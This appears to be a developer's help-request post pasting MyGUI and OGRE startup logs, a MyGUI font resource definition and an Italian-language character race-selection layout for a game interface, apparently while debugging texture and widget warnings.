G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 675 18:24:06 | Core | Info | ResourceTrueTypeFont: Font 'BlackForest' using texture size 128 x 128. | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 674 18:24:06 | Core | Info | ResourceTrueTypeFont: Font 'BlackForest' using real height 14 pixels. | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 675 18:24:06 | Core | Info | Load ini file 'MyGUI_Images.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:06 | Core | Info | Load ini file 'MyGUI_CommonSkins.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:06 | Core | Info | Register value : 'HCenter' = 0 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 238 18:24:06 | Core | Info | Register value : 'VCenter' = 0 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 239 18:24:06 | Core | Info | Register value : 'Center' = 0 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 240 18:24:06 | Core | Info | Register value : 'Left' = 2 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 241 18:24:06 | Core | Info | Register value : 'Right' = 4 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 242 18:24:06 | Core | Info | Register value : 'HStretch' = 6 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 243 18:24:06 | Core | Info | Register value : 'Top' = 8 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 244 18:24:06 | Core | Info | Register value : 'Bottom' = 16 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 245 18:24:06 | Core | Info | Register value : 'VStretch' = 24 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 246 18:24:06 | Core | Info | Register value : 'Stretch' = 30 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 247 18:24:06 | Core | Info | Register value : 'Default' = 10 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 248 18:24:06 | Core | Info | Load ini file 'MyGUI_BlueWhiteTheme.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:06 | Core | Info | Load ini file 'MyGUI_BlueWhiteImages.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:06 | Core | Info | Load ini file 'MyGUI_BlueWhiteSkins.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:07 | Core | Info | Load ini file 'MyGUI_BlueWhiteTemplates.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:07 | Core | Info | Load ini file 'MyGUI_Pointers.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:07 | Core | Info | Load ini file 'MyGUI_Layers.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:07 | Core | Info | Load ini file 'MyGUI_Settings.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:08 | Core | Info | Gui successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Gui.cpp | 133 18:24:08 | Core | Warning | Widget property 'Texture' not found [ifc_login.layout] | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Widget.cpp | 1178 18:24:08 | Core | Warning | Texture 'ifc_login.png' have non power of two size | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_TextureUtility.cpp | 76 18:24:13 | Core | Warning | Widget property 'Texture' not found [ifc_main.layout] | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Widget.cpp | 1178 18:24:13 | Core | Warning | Texture 'ifc_main.png' have non power of two size | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_TextureUtility.cpp | 76 18:24:14 | Core | Warning | Widget property 'Texture' not found [ifc_cr_race.layout] | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Widget.cpp | 1178 18:24:15 | Core | Warning | Texture 'ifc_cr_race.png' have non power of two size | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_TextureUtility.cpp | 76 ```
```18:23:51: Creating resource group General 18:23:51: Creating resource group Internal 18:23:51: Creating resource group Autodetect 18:23:51: SceneManagerFactory for type 'DefaultSceneManager' registered. 18:23:51: Registering ResourceManager for type Material 18:23:51: Registering ResourceManager for type Mesh 18:23:51: Registering ResourceManager for type Skeleton 18:23:51: MovableObjectFactory for type 'ParticleSystem' registered. 18:23:51: OverlayElementFactory for type Panel registered. 18:23:51: OverlayElementFactory for type BorderPanel registered. 18:23:51: OverlayElementFactory for type TextArea registered. 18:23:51: Registering ResourceManager for type Font 18:23:51: ArchiveFactory for archive type FileSystem registered. 18:23:51: ArchiveFactory for archive type Zip registered. 18:23:51: ArchiveFactory for archive type EmbeddedZip registered. 18:23:51: DDS codec registering 18:23:51: FreeImage version: 3.13.1 18:23:51: This program uses FreeImage, a free, open source image library supporting all common bitmap formats. See http://freeimage.sourceforge.net for details 18:23:51: Supported formats: bmp,ico,jpg,jif,jpeg,jpe,jng,koa,iff,lbm,mng,pbm,pbm,pcd,pcx,pgm,pgm,png,ppm,ppm,ras,tga,targa,tif,tiff,wap,wbmp,wbm,psd,cut,xbm,xpm,gif,hdr,g3,sgi,exr,j2k,j2c,jp2,pfm,pct,pict,pic,bay,bmq,cr2,crw,cs1,dc2,dcr,dng,erf,fff,hdr,k25,kdc,mdc,mos,mrw,nef,orf,pef,pxn,raf,raw,rdc,sr2,srf,arw,3fr,cine,ia,kc2,mef,nrw,qtk,rw2,sti,drf,dsc,ptx,cap,iiq,rwz 18:23:51: Registering ResourceManager for type HighLevelGpuProgram 18:23:51: Registering ResourceManager for type Compositor 18:23:51: MovableObjectFactory for type 'Entity' registered. 18:23:51: MovableObjectFactory for type 'Light' registered. 18:23:51: MovableObjectFactory for type 'BillboardSet' registered. 18:23:51: MovableObjectFactory for type 'ManualObject' registered. 18:23:51: MovableObjectFactory for type 'BillboardChain' registered. 18:23:51: MovableObjectFactory for type 'RibbonTrail' registered. 18:23:51: Loading library .\RenderSystem_Direct3D9_d 18:23:52: Installing plugin: D3D9 RenderSystem 18:23:52: D3D9 : Direct3D9 Rendering Subsystem created. 18:23:52: D3D9: Driver Detection Starts 18:23:52: D3D9: Driver Detection Ends 18:23:52: Plugin successfully installed 18:23:52: Loading library .\RenderSystem_GL_d 18:23:52: Installing plugin: GL RenderSystem 18:23:52: OpenGL Rendering Subsystem created. 18:23:53: Plugin successfully installed 18:23:53: Loading library .\Plugin_ParticleFX_d 18:23:53: Installing plugin: ParticleFX 18:23:53: Particle Emitter Type 'Point' registered 18:23:53: Particle Emitter Type 'Box' registered 18:23:53: Particle Emitter Type 'Ellipsoid' registered 18:23:53: Particle Emitter Type 'Cylinder' registered 18:23:53: Particle Emitter Type 'Ring' registered 18:23:53: Particle Emitter Type 'HollowEllipsoid' registered 18:23:53: Particle Affector Type 'LinearForce' registered 18:23:53: Particle Affector Type 'ColourFader' registered 18:23:53: Particle Affector Type 'ColourFader2' registered 18:23:53: Particle Affector Type 'ColourImage' registered 18:23:53: Particle Affector Type 'ColourInterpolator' registered 18:23:53: Particle Affector Type 'Scaler' registered 18:23:53: Particle Affector Type 'Rotator' registered 18:23:53: Particle Affector Type 'DirectionRandomiser' registered 18:23:53: Particle Affector Type 'DeflectorPlane' registered 18:23:53: Plugin successfully installed 18:23:53: Loading library .\Plugin_BSPSceneManager_d 18:23:53: Installing plugin: BSP Scene Manager 18:23:53: Plugin successfully installed 18:23:53: Loading library .\Plugin_CgProgramManager_d 18:23:54: Installing plugin: Cg Program Manager 18:23:54: Plugin successfully installed 18:23:54: Loading library .\Plugin_PCZSceneManager_d 18:23:54: Installing plugin: Portal Connected Zone Scene Manager 18:23:54: PCZone Factory Type 'ZoneType_Default' registered 18:23:54: Plugin successfully installed 18:23:54: Loading library .\Plugin_OctreeZone_d 18:23:54: Installing plugin: Octree Zone Factory 18:23:54: Plugin successfully installed 18:23:54: Loading library .\Plugin_OctreeSceneManager_d 18:23:54: Installing plugin: Octree Scene Manager 18:23:54: Plugin successfully installed 18:23:54: *-*-* OGRE Initialising 18:23:54: *-*-* Version 1.8.0unstable (Byatis) 18:23:54: Added resource location 'gui' of type 'FileSystem' to resource group 'General' 18:23:54: D3D9 : RenderSystem Option: Allow NVPerfHUD = No 18:23:54: D3D9 : RenderSystem Option: FSAA = 0 18:23:54: D3D9 : RenderSystem Option: Fixed Pipeline Enabled = Yes 18:23:54: D3D9 : RenderSystem Option: Floating-point mode = Fastest 18:23:54: D3D9 : RenderSystem Option: Full Screen = No 18:23:54: D3D9 : RenderSystem Option: Multi device memory hint = Use minimum system memory 18:23:54: D3D9 : RenderSystem Option: Rendering Device = Monitor-1-ATI Radeon HD 5450 18:23:54: D3D9 : RenderSystem Option: Resource Creation Policy = Create on all devices 18:23:54: D3D9 : RenderSystem Option: VSync = No 18:23:54: D3D9 : RenderSystem Option: VSync Interval = 1 18:23:54: D3D9 : RenderSystem Option: Video Mode = 1680 x 1050 @ 32-bit colour 18:23:54: D3D9 : RenderSystem Option: sRGB Gamma Conversion = No 18:23:55: CPU Identifier & Features 18:23:55: ------------------------- 18:23:55: * CPU ID: AuthenticAMD: AMD Athlon(tm) II X2 250 Processor 18:23:55: * SSE: yes 18:23:55: * SSE2: yes 18:23:55: * SSE3: yes 18:23:55: * MMX: yes 18:23:55: * MMXEXT: yes 18:23:55: * 3DNOW: yes 18:23:55: * 3DNOWEXT: yes 18:23:55: * CMOV: yes 18:23:55: * TSC: yes 18:23:55: * FPU: yes 18:23:55: * PRO: yes 18:23:55: * HT: no 18:23:55: ------------------------- 18:23:55: D3D9 : Subsystem Initialising 18:23:55: Registering ResourceManager for type Texture 18:23:55: Registering ResourceManager for type GpuProgram 18:23:55: D3D9RenderSystem::_createRenderWindow "TutorialApplication Render Window", 1680x1050 windowed miscParams: FSAA=0 FSAAHint= colourDepth=32 gamma=false monitorIndex=0 useNVPerfHUD=false vsync=false vsyncInterval=1 18:23:56: D3D9 : Created D3D9 Rendering Window 'TutorialApplication Render Window' : 1664x982, 32bpp 18:23:56: D3D9 : WARNING - disabling VSync in windowed mode can cause timing issues at lower frame rates, turn VSync on if you observe this problem. 18:23:56: D3D9: Vertex texture format supported - PF_L8 18:23:56: D3D9: Vertex texture format supported - PF_L16 18:23:56: D3D9: Vertex texture format supported - PF_A8 18:23:56: D3D9: Vertex texture format supported - PF_A4L4 18:23:56: D3D9: Vertex texture format supported - PF_BYTE_LA 18:23:56: D3D9: Vertex texture format supported - PF_R5G6B5 18:23:56: D3D9: Vertex texture format supported - PF_B5G6R5 18:23:56: D3D9: Vertex texture format supported - PF_A4R4G4B4 18:23:56: D3D9: Vertex texture format supported - PF_A1R5G5B5 18:23:56: D3D9: Vertex texture format supported - PF_A8R8G8B8 18:23:56: D3D9: Vertex texture format supported - PF_B8G8R8A8 18:23:56: D3D9: Vertex texture format supported - PF_A2R10G10B10 18:23:56: D3D9: Vertex texture format supported - PF_A2B10G10R10 18:23:56: D3D9: Vertex texture format supported - PF_DXT1 18:23:56: D3D9: Vertex texture format supported - PF_DXT2 18:23:56: D3D9: Vertex texture format supported - PF_DXT3 18:23:56: D3D9: Vertex texture format supported - PF_DXT4 18:23:56: D3D9: Vertex texture format supported - PF_DXT5 18:23:56: D3D9: Vertex texture format supported - PF_FLOAT16_RGB 18:23:56: D3D9: Vertex texture format supported - PF_FLOAT16_RGBA 18:23:56: D3D9: Vertex texture format supported - PF_FLOAT32_RGB 18:23:56: D3D9: Vertex texture format supported - PF_FLOAT32_RGBA 18:23:56: D3D9: Vertex texture format supported - PF_X8R8G8B8 18:23:56: D3D9: Vertex texture format supported - PF_X8B8G8R8 18:23:56: D3D9: Vertex texture format supported - PF_R8G8B8A8 18:23:56: D3D9: Vertex texture format supported - PF_DEPTH 18:23:56: D3D9: Vertex texture format supported - PF_SHORT_RGBA 18:23:56: D3D9: Vertex texture format supported - PF_FLOAT16_R 18:23:56: D3D9: Vertex texture format supported - PF_FLOAT32_R 18:23:56: D3D9: Vertex texture format supported - PF_SHORT_GR 18:23:56: D3D9: Vertex texture format supported - PF_FLOAT16_GR 18:23:56: D3D9: Vertex texture format supported - PF_FLOAT32_GR 18:23:56: D3D9: Vertex texture format supported - PF_SHORT_RGB 18:23:56: D3D9: Vertex texture format supported - PF_PVRTC_RGB2 18:23:56: D3D9: Vertex texture format supported - PF_PVRTC_RGBA2 18:23:56: D3D9: Vertex texture format supported - PF_PVRTC_RGB4 18:23:56: D3D9: Vertex texture format supported - PF_PVRTC_RGBA4 18:23:56: D3D9: Vertex texture format supported - PF_R8 18:23:56: D3D9: Vertex texture format supported - PF_RG8 18:23:56: RenderSystem capabilities 18:23:56: ------------------------- 18:23:56: RenderSystem Name: Direct3D9 Rendering Subsystem 18:23:56: GPU Vendor: ati 18:23:56: Device Name: Monitor-1-ATI Radeon HD 5450 18:23:56: Driver Version: 8.17.10.1124 18:23:56: * Fixed function pipeline: yes 18:23:56: * Hardware generation of mipmaps: yes 18:23:56: * Texture blending: yes 18:23:56: * Anisotropic texture filtering: yes 18:23:56: * Dot product texture operation: yes 18:23:56: * Cube mapping: yes 18:23:56: * Hardware stencil buffer: yes 18:23:56: - Stencil depth: 8 18:23:56: - Two sided stencil support: yes 18:23:56: - Wrap stencil values: yes 18:23:56: * Hardware vertex / index buffers: yes 18:23:56: * Vertex programs: yes 18:23:56: * Number of floating-point constants for vertex programs: 256 18:23:56: * Number of integer constants for vertex programs: 16 18:23:56: * Number of boolean constants for vertex programs: 16 18:23:56: * Fragment programs: yes 18:23:56: * Number of floating-point constants for fragment programs: 224 18:23:56: * Number of integer constants for fragment programs: 16 18:23:56: * Number of boolean constants for fragment programs: 16 18:23:56: * Geometry programs: no 18:23:56: * Number of floating-point constants for geometry programs: 0 18:23:56: * Number of integer constants for geometry programs: 0 18:23:56: * Number of boolean constants for geometry programs: 0 18:23:56: * Supported Shader Profiles: hlsl ps_1_1 ps_1_2 ps_1_3 ps_1_4 ps_2_0 ps_2_a ps_2_b ps_2_x ps_3_0 vs_1_1 vs_2_0 vs_2_a vs_2_x vs_3_0 18:23:56: * Texture Compression: yes 18:23:56: - DXT: yes 18:23:56: - VTC: no 18:23:56: - PVRTC: no 18:23:56: * Scissor Rectangle: yes 18:23:56: * Hardware Occlusion Query: yes 18:23:56: * User clip planes: yes 18:23:56: * VET_UBYTE4 vertex element type: yes 18:23:56: * Infinite far plane projection: yes 18:23:56: * Hardware render-to-texture: yes 18:23:56: * Floating point textures: yes 18:23:56: * Non-power-of-two textures: yes 18:23:56: * Volume textures: yes 18:23:56: * Multiple Render Targets: 4 18:23:56: - With different bit depths: yes 18:23:56: * Point Sprites: yes 18:23:56: * Extended point parameters: yes 18:23:56: * Max Point Size: 256 18:23:56: * Vertex texture fetch: yes 18:23:56: * Number of world matrices: 0 18:23:56: * Number of texture units: 8 18:23:56: * Stencil buffer depth: 8 18:23:56: * Number of vertex blend matrices: 0 18:23:56: - Max vertex textures: 4 18:23:56: - Vertex textures shared: no 18:23:56: * Render to Vertex Buffer : no 18:23:56: * DirectX per stage constants: yes 18:23:56: *************************************** 18:23:56: *** D3D9 : Subsystem Initialised OK *** 18:23:56: *************************************** 18:23:56: DefaultWorkQueue('Root') initialising on thread main. 18:23:56: Particle Renderer Type 'billboard' registered 18:23:56: SceneManagerFactory for type 'BspSceneManager' registered. 18:23:56: Registering ResourceManager for type BspLevel 18:23:56: SceneManagerFactory for type 'PCZSceneManager' registered. 18:23:56: MovableObjectFactory for type 'PCZLight' registered. 18:23:56: MovableObjectFactory for type 'Portal' registered. 18:23:56: MovableObjectFactory for type 'AntiPortal' registered. 18:23:56: PCZone Factory Type 'ZoneType_Octree' registered 18:23:56: SceneManagerFactory for type 'OctreeSceneManager' registered. 18:23:56: Parsing scripts for resource group Autodetect 18:23:56: Finished parsing scripts for resource group Autodetect 18:23:56: Creating resources for group Autodetect 18:23:56: All done 18:23:56: Parsing scripts for resource group General 18:23:56: Finished parsing scripts for resource group General 18:23:56: Creating resources for group General 18:23:56: All done 18:23:56: Parsing scripts for resource group Internal 18:23:56: Finished parsing scripts for resource group Internal 18:23:56: Creating resources for group Internal 18:23:56: All done 18:24:07: Texture: MyGUI_BlueWhiteSkins.png: Loading 1 faces(PF_A8R8G8B8,512x256x1) with 0 generated mipmaps from Image. Internal format is PF_A8R8G8B8,512x256x1. 18:24:08: Texture: MyGUI_Pointers.png: Loading 1 faces(PF_A8R8G8B8,256x128x1) with 0 generated mipmaps from Image. Internal format is PF_A8R8G8B8,256x128x1. 18:24:08: Texture: ifc_login.png: Loading 1 faces(PF_A8R8G8B8,1440x900x1) with 0 generated mipmaps from Image. Internal format is PF_A8R8G8B8,1440x900x1. 18:24:08: *** Initializing OIS *** 18:24:13: Texture: ifc_main.png: Loading 1 faces(PF_A8R8G8B8,1440x900x1) with 0 generated mipmaps from Image. Internal format is PF_A8R8G8B8,1440x900x1. 18:24:15: Texture: ifc_cr_race.png: Loading 1 faces(PF_A8R8G8B8,1440x900x1) with 0 generated mipmaps from Image. Internal format is PF_A8R8G8B8,1440x900x1. ```
```<?xml version="1.0" encoding="UTF-8"?> <MyGUI type="Resource" version="1.1"> <Resource type="ResourceTrueTypeFont" name="font_DejaVuSans.17"> <Property key="Source" value="DejaVuSans.ttf"/> <Property key="Size" value="19"/> <Property key="Resolution" value="50"/> <Property key="Antialias" value="false"/> <Property key="SpaceWidth" value="4"/> <Property key="TabWidth" value="8"/> <Property key="CursorWidth" value="2"/> <Property key="Distance" value="6"/> <Property key="OffsetHeight" value="0"/> <Codes> <Code range="33 126"/> <Code range="1025 1105"/> <Code range="8470"/> <Code hide="128"/> <Code hide="1026 1039"/> <Code hide="1104"/> </Codes> </Resource> <Resource type="ResourceTrueTypeFont" name="Arial"> <Property key="Source" value="arial.ttf"/> <Property key="Size" value="19"/> <Property key="Resolution" value="50"/> <Property key="Antialias" value="false"/> <Property key="SpaceWidth" value="4"/> <Property key="TabWidth" value="8"/> <Property key="CursorWidth" value="2"/> <Property key="Distance" value="6"/> <Property key="OffsetHeight" value="0"/> </Resource> <Resource type="ResourceTrueTypeFont" name="Black_Forest"> <Property key="Source" value="blackforest.ttf"/> <Property key="Size" value="19"/> <Property key="Resolution" value="50"/> <Property key="Antialias" value="false"/> <Property key="SpaceWidth" value="4"/> <Property key="TabWidth" value="8"/> <Property key="CursorWidth" value="2"/> <Property key="Distance" value="6"/> <Property key="OffsetHeight" value="0"/> </Resource> <Resource type="ResourceTrueTypeFont" name="font_DejaVuSans.14"> <Property key="Source" value="DejaVuSans.ttf"/> <Property key="Size" value="16"/> <Property key="Resolution" value="50"/> <Property key="Antialias" value="false"/> <Property key="SpaceWidth" value="4"/> <Property key="TabWidth" value="8"/> <Property key="CursorWidth" value="2"/> <Property key="Distance" value="7"/> <Property key="OffsetHeight" value="0"/> <Codes> <Code range="33 126"/> <Code range="1025 1105"/> <Code range="8470"/> <Code hide="128"/> <Code hide="1026 1039"/> <Code hide="1104"/> </Codes> </Resource> <Resource type="ResourceManualFont" name="font_Micro.11"> <Property key="Source" value="core_micro_font.PNG"/> <Property key="DefaultHeight" value="11"/> <Codes> <!--cursor--> <Code index="cursor" coord="10 5 2 4"/> <!--selected--> <Code index="selected" coord="22 5 2 4"/> <Code index="selected_back" coord="32 5 2 4"/> <!--space--> <Code index="32" coord="60 2 4 11"/> <!--tab--> <Code index="9" coord="50 2 14 11"/> <!--symbol--> <Code index="33" coord="70 2 2 11"/> <Code index="34" coord="80 2 4 11"/> <Code index="35" coord="90 2 7 11"/> <Code index="36" coord="100 2 6 11"/> <Code index="37" coord="110 2 8 11"/> <Code index="38" coord="120 2 7 11"/> <Code index="39" coord="130 2 2 11"/> <Code index="40" coord="140 2 3 11"/> <Code index="41" coord="150 2 3 11"/> <Code index="42" coord="160 2 6 11"/> <Code index="43" coord="170 2 6 11"/> <Code index="44" coord="180 2 3 11"/> <Code index="45" coord="190 2 6 11"/> <Code index="46" coord="200 2 2 11"/> <Code index="47" coord="210 2 5 11"/> <Code index="58" coord="320 2 2 11"/> <Code index="59" coord="330 2 3 11"/> <Code index="60" coord="340 2 4 11"/> <Code index="61" coord="350 2 6 11"/> <Code index="62" coord="360 2 4 11"/> <Code index="63" coord="370 2 6 11"/> <Code index="64" coord="380 2 6 11"/> <Code index="91" coord="270 14 4 11"/> <Code index="92" coord="280 14 5 11"/> <Code index="93" coord="290 14 4 11"/> <Code index="94" coord="300 14 6 11"/> <Code index="95" coord="310 14 6 11"/> <Code index="96" coord="320 14 3 11"/> <Code index="123" coord="270 26 4 11"/> <Code index="124" coord="280 26 2 11"/> <Code index="125" coord="290 26 4 11"/> <Code index="126" coord="300 26 6 11"/> <!--0-9--> <Code index="48" coord="220 2 6 11"/> <Code index="49" coord="230 2 4 11"/> <Code index="50" coord="240 2 6 11"/> <Code index="51" coord="250 2 6 11"/> <Code index="52" coord="260 2 6 11"/> <Code index="53" coord="270 2 6 11"/> <Code index="54" coord="280 2 6 11"/> <Code index="55" coord="290 2 6 11"/> <Code index="56" coord="300 2 6 11"/> <Code index="57" coord="310 2 6 11"/> <!--A-Z--> <Code index="65" coord="10 14 6 11"/> <Code index="66" coord="20 14 6 11"/> <Code index="67" coord="30 14 6 11"/> <Code index="68" coord="40 14 6 11"/> <Code index="69" coord="50 14 5 11"/> <Code index="70" coord="60 14 5 11"/> <Code index="71" coord="70 14 6 11"/> <Code index="72" coord="80 14 6 11"/> <Code index="73" coord="90 14 2 11"/> <Code index="74" coord="100 14 5 11"/> <Code index="75" coord="110 14 6 11"/> <Code index="76" coord="120 14 5 11"/> <Code index="77" coord="130 14 8 11"/> <Code index="78" coord="140 14 6 11"/> <Code index="79" coord="150 14 6 11"/> <Code index="80" coord="160 14 6 11"/> <Code index="81" coord="170 14 6 11"/> <Code index="82" coord="180 14 6 11"/> <Code index="83" coord="190 14 6 11"/> <Code index="84" coord="200 14 6 11"/> <Code index="85" coord="210 14 6 11"/> <Code index="86" coord="220 14 6 11"/> <Code index="87" coord="230 14 8 11"/> <Code index="88" coord="240 14 6 11"/> <Code index="89" coord="250 14 6 11"/> <Code index="90" coord="260 14 6 11"/> <!--a-z--> <Code index="97" coord="10 26 6 11"/> <Code index="98" coord="20 26 6 11"/> <Code index="99" coord="30 26 6 11"/> <Code index="100" coord="40 26 6 11"/> <Code index="101" coord="50 26 6 11"/> <Code index="102" coord="60 26 5 11"/> <Code index="103" coord="70 26 6 11"/> <Code index="104" coord="80 26 6 11"/> <Code index="105" coord="90 26 2 11"/> <Code index="106" coord="100 26 4 11"/> <Code index="107" coord="110 26 6 11"/> <Code index="108" coord="120 26 2 11"/> <Code index="109" coord="130 26 8 11"/> <Code index="110" coord="140 26 6 11"/> <Code index="111" coord="150 26 6 11"/> <Code index="112" coord="160 26 6 11"/> <Code index="113" coord="170 26 6 11"/> <Code index="114" coord="180 26 5 11"/> <Code index="115" coord="190 26 6 11"/> <Code index="116" coord="200 26 6 11"/> <Code index="117" coord="210 26 6 11"/> <Code index="118" coord="220 26 6 11"/> <Code index="119" coord="230 26 8 11"/> <Code index="120" coord="240 26 6 11"/> <Code index="121" coord="250 26 6 11"/> <Code index="122" coord="260 26 6 11"/> <!--А-Я, Ё--> <Code index="1040" coord="10 38 6 11"/> <Code index="1041" coord="20 38 6 11"/> <Code index="1042" coord="30 38 6 11"/> <Code index="1043" coord="40 38 5 11"/> <Code index="1044" coord="50 38 8 11"/> <Code index="1045" coord="60 38 5 11"/> <Code index="1046" coord="70 38 10 11"/> <Code index="1047" coord="80 38 6 11"/> <Code index="1048" coord="90 38 6 11"/> <Code index="1049" coord="100 38 6 11"/> <Code index="1050" coord="110 38 6 11"/> <Code index="1051" coord="120 38 7 11"/> <Code index="1052" coord="130 38 8 11"/> <Code index="1053" coord="140 38 6 11"/> <Code index="1054" coord="150 38 6 11"/> <Code index="1055" coord="160 38 6 11"/> <Code index="1056" coord="170 38 6 11"/> <Code index="1057" coord="180 38 6 11"/> <Code index="1058" coord="190 38 6 11"/> <Code index="1059" coord="200 38 6 11"/> <Code index="1060" coord="210 38 8 11"/> <Code index="1061" coord="220 38 6 11"/> <Code index="1062" coord="230 38 7 11"/> <Code index="1063" coord="240 38 6 11"/> <Code index="1064" coord="250 38 8 11"/> <Code index="1065" coord="260 38 9 11"/> <Code index="1066" coord="270 38 8 11"/> <Code index="1067" coord="280 38 8 11"/> <Code index="1068" coord="290 38 6 11"/> <Code index="1069" coord="300 38 6 11"/> <Code index="1070" coord="310 38 8 11"/> <Code index="1071" coord="320 38 6 11"/> <Code index="1025" coord="330 38 5 11"/> <!--а-я, ё--> <Code index="1072" coord="10 50 6 11"/> <Code index="1073" coord="20 50 6 11"/> <Code index="1074" coord="30 50 6 11"/> <Code index="1075" coord="40 50 5 11"/> <Code index="1076" coord="50 50 7 11"/> <Code index="1077" coord="60 50 6 11"/> <Code index="1078" coord="70 50 8 11"/> <Code index="1079" coord="80 50 6 11"/> <Code index="1080" coord="90 50 6 11"/> <Code index="1081" coord="100 50 6 11"/> <Code index="1082" coord="110 50 6 11"/> <Code index="1083" coord="120 50 6 11"/> <Code index="1084" coord="130 50 6 11"/> <Code index="1085" coord="140 50 6 11"/> <Code index="1086" coord="150 50 6 11"/> <Code index="1087" coord="160 50 6 11"/> <Code index="1088" coord="170 50 6 11"/> <Code index="1089" coord="180 50 6 11"/> <Code index="1090" coord="190 50 6 11"/> <Code index="1091" coord="200 50 6 11"/> <Code index="1092" coord="210 50 8 11"/> <Code index="1093" coord="220 50 6 11"/> <Code index="1094" coord="230 50 6 11"/> <Code index="1095" coord="240 50 6 11"/> <Code index="1096" coord="250 50 8 11"/> <Code index="1097" coord="260 50 9 11"/> <Code index="1098" coord="270 50 8 11"/> <Code index="1099" coord="280 50 8 11"/> <Code index="1100" coord="290 50 6 11"/> <Code index="1101" coord="300 50 6 11"/> <Code index="1102" coord="310 50 8 11"/> <Code index="1103" coord="320 50 6 11"/> <Code index="1105" coord="330 50 6 11"/> </Codes> </Resource> </MyGUI> ```
```<?xml version="1.0" encoding="UTF-8"?> <MyGUI type="Layout" version="3.2.0"> <Widget type="ImageBox" skin="ImageBox" position="0 0 1440 900" layer="Back" name="CRRBG"> <Property key="Texture" value="ifc_cr_race.png"/> <Property key="ImageTexture" value="ifc_cr_race.png"/> <Widget type="Button" skin="Button" position="40 32 208 56" name="CRRBGUM"> <Property key="Caption" value="Umano"/> <UserString key="DBINDEX" value="1"/> </Widget> <Widget type="Button" skin="Button" position="40 104 208 56" name="CRRBGNA"> <Property key="Caption" value="Nano"/> <UserString key="DBINDEX" value="2"/> </Widget> <Widget type="Button" skin="Button" position="40 176 208 56" name="CRRBGEL"> <Property key="Caption" value="Elfo"/> <UserString key="DBINDEX" value="3"/> </Widget> <Widget type="Button" skin="Button" position="40 248 208 56" name="CRRBGHA"> <Property key="Caption" value="Halfling"/> <UserString key="DBINDEX" value="8"/> </Widget> <Widget type="Button" skin="Button" position="1180 32 208 56" name="CRRBGMO"> <Property key="Caption" value="Mezzorco"/> <UserString key="DBINDEX" value="9"/> </Widget> <Widget type="Button" skin="Button" position="1180 104 208 56" name="CRRBGMD"> <Property key="Caption" value="Stirpe Demoniaca"/> <UserString key="DBINDEX" value="6"/> </Widget> <Widget type="Button" skin="Button" position="1180 176 208 56" name="CRRBGMA"> <Property key="Caption" value="Stirpe Angelica"/> <UserString key="DBINDEX" value="5"/> </Widget> <Widget type="Button" skin="Button" position="1180 248 208 56" name="CRRBGME"> <Property key="Caption" value="Mezz'elfo"/> <UserString key="DBINDEX" value="4"/> </Widget> <Widget type="Button" skin="Button" position="40 320 208 56" name="CRRBGGN"> <Property key="Caption" value="Gnomo"/> <UserString key="DBINDEX" value="7"/> </Widget> <Widget type="ImageBox" skin="ImageBox" position="736 32 352 552" name="CRRBGIM"/> <Widget type="Button" skin="Button" position="1185 800 104 72" name="CRRBGES"/> <Widget type="Button" skin="Button" position="1295 800 104 72" name="CRRBGAV"/> <Widget type="EditBox" skin="EditBox" position="320 32 352 552" name="CRRBGD"> <Property key="MultiLine" value="true"/> <Property key="ReadOnly" value="true"/> <Property key="WordWrap" value="true"/> <Property key="TextAlign" value="Left Top"/> <Property key="FontName" value="Arial"/> </Widget> <Widget type="TextBox" skin="TextBox" position="1185 775 210 20" name="CRRBGRC"/> </Widget> </MyGUI> ```
this is function where i initialize form
